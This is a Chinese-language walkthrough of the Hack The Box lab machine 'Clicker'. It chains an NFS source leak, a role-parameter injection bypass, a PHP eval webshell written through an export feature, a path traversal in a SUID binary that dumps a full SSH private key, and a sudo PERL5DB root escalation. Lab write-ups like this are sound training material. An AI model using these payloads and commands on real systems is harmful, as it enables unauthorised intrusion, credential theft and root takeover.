Clicker_Medium

Clicker_Medium

碎碎念:这个靶场一会清一下数据,烦死了!!!

img

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
namp:
--min-rate 10000 10000速率来扫描
-p- 全端口
-p80,135 指定80,135端口扫描
-sU 指定udp扫描
-sT 指定tcp协议
-sV 扫描服务版本
-sC 默认脚本扫描
-O 对操作系统和版本探测
--script=vuln 进行基础漏洞扫描


nmap -p- --min-rate 10000 10.129.47.107
nmap -p- -sU --min-rate 10000 10.129.47.107
nmap -p22,80,111,2049,34327,39809,45161,53053,60989 --script=vuln 10.129.47.107
nmap -p22,80,111,2049,34327,39809,45161,53053,60989 -sV -sC -sT -O 10.129.47.107

22/TCP端口上的SSH服务版本号为OpenSSH 8.9p1

80/TCP端口上HTTP服务版本是Apache httpd 2.4.52

2049/TCP端口则是运行NFS(Network File System)服务

此外,这个主机还过滤了111/TCP端口,也就是RPCbind端口,这可能表示该主机已经启用了防火墙且限制了对RPC服务的访问。

img

尝试访问80端口 发现跳转至 http://clicker.htb/

img

修改hosts文件

1
vim /etc/hosts

img

漏洞探测

80 端口乱打一通,没发现可利用点,根据 nmap 扫描结果,先行查看 2049 端口NFS服务

1
2
3
NFS(Network File System)是一种分布式文件系统协议,允许计算机通过网络共享文件和目录。
NFS最初由Sun Microsystems开发,用于在UNIX和类UNIX系统之间实现文件共享。它是基于客户端-服务器模型的,其中文件存储在服务器上,并通过网络提供给客户端进行访问。客户端可以远程挂载服务器上的文件系统,使得这些文件在客户端上就像本地文件一样可用。
NFS使用RPC(Remote Procedure Call)机制进行通信。客户端发送请求到服务器,并且服务器返回请求的文件或目录。NFS支持读、写、创建、删除等文件操作,并提供文件锁定机制以确保并发访问的一致性。

NFS文件共享漏洞

参考文章:6-19漏洞利用-nfs获取目标密码文件_nfs漏洞利用-CSDN博客nfs文件共享漏洞_nfs漏洞-CSDN博客

1
2
showmount -e 10.129.47.107
mount -t nfs 10.129.47.107:/mnt/backups /root/桌面/nfs -o nolock

img

解压查看备份源码 发现突破点出现在save_game.php

img

该代码是一个 PHP 页面,用于保存用户在游戏中的个人资料并更新会话信息。

首先,它使用了 session_start() 函数来启动一个会话,并根据是否设置了 SESSION[‘PLAYER’] 并且其不为空,判断用户是否已经登录。如果用户已经登录,则获取 GET 请求参数并调用 save_profile() 函数,将用户的游戏信息保存到数据库中。注意在获取 GET 请求参数时,代码对参数列表进行了遍历,并在其中查找“role”参数,以防止恶意用户通过修改“role”参数来实现非法操作。但是它没有对用户输入进行任何过滤和验证,使得恶意用户可以通过在 GET 请求中传递恶意参数来攻击系统。然后,代码更新了会话信息,包括用户的点击数和等级,并通过 header() 函数将用户重定向回主页,并带上一个消息提示。

img

根据 admin.php 文件中 if 语句可知 如果 SESSION[“ROLE”] 的值不等于 “Admin”,也就是用户不是管理员,那么代码会使用 header() 函数将用户重定向回主页,并终止脚本的执行。

img

于是可以尝试在 save_game.php 提交参数时插入 role=Admin 来赋予当前账户管理员权限。

漏洞利用

注册任意账户并登录

http://clicker.htb/play.php

尝试直接拼接,显示 检测到恶意活动! 尝试绕过它

img

CRLF注入:每日漏洞 | CRLF注入 - FreeBuf网络安全行业门户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
使用 %0a 或 %0d 均可

GET /save_game.php?clicks=0&level=1&role%0d=Admin HTTP/1.1
Host: clicker.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://clicker.htb/play.php
Cookie: PHPSESSID=sufjgvlfjcdiqk7fn7o7enn5g7
Upgrade-Insecure-Requests: 1



GET /save_game.php?clicks=0&level=1&role%0a=Admin HTTP/1.1
Host: clicker.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://clicker.htb/play.php
Cookie: PHPSESSID=sufjgvlfjcdiqk7fn7o7enn5g7
Upgrade-Insecure-Requests: 1

img

注销登录并重新登录,当前已是管理员权限

img

此处有一导出功能,支持 txt,josn,html 方式

img

尝试抓包修改为 php,可行,尝试内容写马生成 php 文件

img

img

查看 export.php

可以通过控制当前用户的 Nickname,Clicks, Level 来控制生成文件的内容

img

Nickname即为注册时的用户名,尝试重新注册直接写 php 代码,提示不允许输入特殊字符,pass

img

save_game.php 提交参数时可以插入数据,尝试在 save_game.php 处修改Nickname进行参数覆盖

写入 PHP 一句话木马

1
2
3
4
5
6
7
8
9
10
GET /save_game.php?clicks=99999999&level=1&Nickname=<?php+eval($_POST['hacker']);+?>&role%0a=Admin HTTP/1.1
Host: clicker.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://clicker.htb/play.php
Cookie: PHPSESSID=sufjgvlfjcdiqk7fn7o7enn5g7
Upgrade-Insecure-Requests: 1

img

http://clicker.htb/admin.php 导出为 php 文件

img

img

因为靶机一会清理一下数据文件,msf 反弹一个 shell稳定一下

img

权限提升

suid 提权 Linux下SUID提权方法_linux suid提权_~Echo的博客-CSDN博客

img

img

使用二进制文件执行以下任务:

1:创建数据库结构,并添加admin用户

2:制造假玩家(最好不要告诉任何人)

3:重置admin密码

4:删除除admin以外的所有用户

尝试运行一下 ./execute_query 1 ,它好像把 SQL 脚本运行并读取回显出来了

img

strace跟踪一下看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
strace ./execute_query 1


execve("./execute_query", ["./execute_query", "1"], 0x7fff84480298 /* 13 vars */) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
brk(NULL) = 0x55a24a765000
File not readable or not found
arch_prctl(0x3001 /* ARCH_??? */, 0x7fffe69032d0) = -1 EINVAL (Invalid argument)
fcntl(0, F_GETFD) = 0
fcntl(1, F_GETFD) = 0
fcntl(2, F_GETFD) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffb09b2c000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=21007, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 21007, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffb09b26000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 48, 848) = 48
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\"\233}\305\t\5?\344\337^)\350b\231\21\360"..., 68, 896) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2216304, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffb098fe000
mmap(0x7ffb09926000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7ffb09926000
mmap(0x7ffb09abb000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7ffb09abb000
mmap(0x7ffb09b13000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7ffb09b13000
mmap(0x7ffb09b19000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffb09b19000
close(3) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffb098fb000
arch_prctl(ARCH_SET_FS, 0x7ffb098fb740) = 0
set_tid_address(0x7ffb098fba10) = 2703
set_robust_list(0x7ffb098fba20, 24) = 0
rseq(0x7ffb098fc0e0, 0x20, 0, 0x53053053) = 0
mprotect(0x7ffb09b13000, 16384, PROT_READ) = 0
mprotect(0x55a249dd2000, 4096, PROT_READ) = 0
mprotect(0x7ffb09b66000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7ffb09b26000, 21007) = 0
getrandom("\x5a\xbd\x67\xef\xdc\xeb\x94\xd9", 8, GRND_NONBLOCK) = 8
brk(NULL) = 0x55a24a765000
brk(0x55a24a786000) = 0x55a24a786000
setreuid(1000, 1000) = -1 EPERM (Operation not permitted)
access("/home/jack/queries/create.sql", R_OK) = -1 EACCES (Permission denied)
newfstatat(1, "", {st_mode=S_IFIFO|0600, st_size=0, ...}, AT_EMPTY_PATH) = 0
write(1, "File not readable or not found\n", 31) = 31
exit_group(0) = ?
+++ exited with 0 +++

这段输出是使用strace命令跟踪执行一个名为”execute_query”的程序时的结果。strace用于追踪和记录程序执行期间的系统调用和信号。

根据输出,我们可以得到一些信息:

  1. 程序通过execve函数加载并执行了”./execute_query”。
  2. 程序尝试访问了”/etc/suid-debug”文件,但返回了”ENOENT”错误,表示该文件不存在。
  3. 程序调用了一系列的fcntl、mmap、openat系统调用,用于加载动态链接库和其他相关资源。
  4. 程序尝试访问了”/etc/ld.so.preload”和”/etc/ld.so.cache”文件,但都返回了”ENOENT”错误,表示这些文件不存在。
  5. 程序加载了”/lib/x86_64-linux-gnu/libc.so.6”动态链接库。
  6. 程序对内存进行了一些操作,如mmap和mprotect,用于分配和保护内存区域。
  7. 程序调用了setreuid函数,并返回了”EPERM”错误,表示当前用户没有权限进行该操作。
  8. 程序尝试访问”/home/jack/queries/create.sql”文件,但返回了”EACCES”错误,表示没有读取该文件的权限。
  9. 程序在标准输出上打印了”File not readable or not found”。
  10. 程序通过exit_group函数正常退出,返回值为0。

分别starace执行 1,2,3,4 参数,发现都是访问 SQL 脚本

img

执行一下,证明猜想 运行并读取了 SQL 脚本

img

参数 1,2,3,4都指定了路径

一顿跟踪尝试,发现需要两个参数

第一个参数是一个大于4的数字

第二个参数是指定要执行的sql语句的文件位置

因为目前我们的位置在 /home/jack/query 需要三个../来跳出目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
strace ./execute_query 5 ../../../etc/passwd


execve("./execute_query", ["./execute_query", "5", "../../../etc/passwd"], 0x7ffccb61acf0 /* 13 vars */) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
brk(NULL) = 0x55a5dbdcf000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fffa7d41040) = -1 EINVAL (Invalid argument)
fcntl(0, F_GETFD) = 0
fcntl(1, F_GETFD) = 0
fcntl(2, F_GETFD) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff30be71000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=21007, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 21007, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff30be6b000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 48, 848) = 48
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\"\233}\305\t\5?\344\337^)\350b\231\21\360"..., 68, 896) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2216304, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff30bc43000
mmap(0x7ff30bc6b000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7ff30bc6b000
mmap(0x7ff30be00000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7ff30be00000
mmap(0x7ff30be58000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7ff30be58000
mmap(0x7ff30be5e000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff30be5e000
close(3) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff30bc40000
arch_prctl(ARCH_SET_FS, 0x7ff30bc40740) = 0
set_tid_address(0x7ff30bc40a10) = 2872
set_robust_list(0x7ff30bc40a20, 24) = 0
rseq(0x7ff30bc410e0, 0x20, 0, 0x53053053) = 0
mprotect(0x7ff30be58000, 16384, PROT_READ) = 0
mprotect(0x55a5db366000, 4096, PROT_READ) = 0
mprotect(0x7ff30beab000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7ff30be6b000, 21007) = 0
getrandom("\x03\x30\x24\x82\x73\x39\x44\x6d", 8, GRND_NONBLOCK) = 8
brk(NULL) = 0x55a5dbdcf000
brk(0x55a5dbdf0000) = 0x55a5dbdf0000
setreuid(1000, 1000) = -1 EPERM (Operation not permitted)
access("/home/jack/queries/../../../etc/passwd", R_OK) = -1 EACCES (Permission denied)
newfstatat(1, "", {st_mode=S_IFIFO|0600, st_size=0, ...}, AT_EMPTY_PATH) = 0
File not readable or not found
write(1, "File not readable or not found\n", 31) = 31
exit_group(0) = ?
+++ exited with 0 +++

img

img

尝试读取 jack用户私钥文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
./execute_query 5 ../.ssh/id_rsa


mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
-----BEGIN OPENSSH PRIVATE KEY----
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
-----END OPENSSH PRIVATE KEY----
--------------

ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAA' at line 1

保存到本地连接 ssh,记得补齐-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

给文件一个 600 权限,登录 ssh

1
2
chmod 600 id_rsa
ssh -i id_rsa jack@10.10.11.232

img

找到第一个 flag:5fdd6314e0fb12c8713770039cf6bad7

img

1
2
3
4
sudo -l			检查当前用户在sudo配置中被授权执行哪些命令。
cd /opt 将当前工作目录更改为/opt。
ls -al 列出/opt目录中的所有文件和子目录,并显示它们的详细信息,包括权限、所有者和修改日期等。
cat monitor.sh 输出名为monitor.sh的文件的内容

img

sudo -l 获取到的一些信息

1
2
3
4
5
任意命令执行:用户"jack"可以以任意身份运行任何命令。

SETENV特权:用户"jack"可以使用SETENV特权设置环境变量,而无需输入密码。

NOPASSWD特权:用户"jack"以root用户身份执行"/opt/monitor.sh"脚本时,不需要输入密码。

monitor.sh这段脚本是一个Bash脚本,用于执行一系列操作并保存诊断数据到文件中。

首先,它检查当前用户的EUID(Effective User ID),如果不是0(即不是root用户),则输出错误信息并退出脚本。

接下来,它设置了PATH环境变量,指定了一组路径,以确保可以找到所需的命令和程序。

然后,它使用curl命令获取一个URL(http://clicker.htb/diagnostic.php?token=secret_diagnostic_token)返回的数据,并将结果存储在变量$data中。

接着,它使用xml_pp对$data进行格式化,然后输出到屏幕上。

如果变量$NOSAVE的值为”true”,则脚本直接退出。

否则,它使用date命令获取当前时间戳,并将data的内容保存到/root/diagnostic_files/diagnostic_{timestamp}.xml文件中。

查看 xml_pp

img

CVE 2016-1531提权

1
2
3
4
sudo PERL5OPT=-d PERL5DB='exec "ls /root"' /opt/monitor.sh
sudo PERL5OPT=-d PERL5DB='exec "cat /root/root.txt"' /opt/monitor.sh
sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh
bash -p

img

拿到第二个 flag:635e217dd41a18dae7f1843b7d5509c6